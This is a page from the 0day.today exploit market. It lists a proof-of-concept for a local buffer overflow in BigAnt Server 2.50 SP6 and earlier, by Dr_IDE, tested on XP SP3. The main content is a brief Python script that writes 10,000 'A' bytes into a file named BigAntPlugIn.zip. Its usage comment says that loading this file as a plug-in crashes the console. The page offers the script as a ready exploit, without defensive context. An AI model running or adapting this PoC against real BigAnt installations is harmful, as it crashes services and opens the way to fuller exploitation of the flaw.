[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2

Author
Dr_IDE
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7027
Category
dos / poc
Date add
20-09-2009
Platform
unsorted
=================================================================
BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
=================================================================


#!/usr/bin/env python

########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: 	Dr_IDE
# Tested:   	XPSP3
# Usage:		Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################

buff = ("\x41" * 10000)

f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()



#  0day.today [2024-11-15]  #